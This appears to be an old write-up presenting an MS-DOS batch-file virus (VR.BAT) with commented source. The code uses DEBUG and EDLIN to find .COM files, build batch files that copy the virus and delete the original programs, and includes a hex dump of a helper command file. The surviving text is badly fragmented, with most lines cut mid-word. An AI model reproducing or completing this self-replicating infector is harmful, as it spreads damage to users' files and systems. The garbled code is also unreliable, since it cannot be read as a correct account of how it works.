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2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thought that viruses could be in BATCH file.This virus which w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see makes use of MS-DOS operating system. This BAT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EBUG &amp; EDL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V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= off         ( Self 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nul           ( This is important. Console output is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msdos      ( May differ on other sys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*.com/w&gt;ind    ( The directory is written on "ind" ONLY name entries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ind&lt;1        ( "Ind" is processed with EDLIN so only file names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d&lt;2        ( New batch program is created with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name.bat&lt;3   ( This batch goes to an executable form because of ED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           ( Console interface is again as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( Newly created NAME.BA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le to this Batch file,there command files,here named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irst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4d               ( Here line 1-4 of the "IND" file are dele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( Sav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,10b,f000      (First program name is moved to the F000H address to sav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08 ".BAT"        (Extention of file name is changed to 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,10b,f010      (File is sav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0"DEL "         (DEL command is written to address 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00,f00b,104     (Original file is written after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 2e            (Period is placed in from of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0 0d,0a         (Carrige return+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0,f020,11f     ( Modified file is moved to 11FH address from buffer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 "COPY \VR.BAT" ( COPY command is now placed in front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 od,0a         (COPY command terminated with carriage return +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                ( The CX register i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                 ( set to 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e.bat          ( Name it NAME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( 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( qu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mmand file must be printed as a hex dump becaus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rol characters (1Ah=Control Z) and this is not entirely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dump of the third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0   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79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,  1  ?        .  .  n  y  y  y  y  y  y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 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79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.  2  ,  ?  ?  r     .  .  n  n  y  y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 79 79 79 79 29 0D 45 0D-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y  y  y     .  E  .  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virus to work VR.BAT should be in the roo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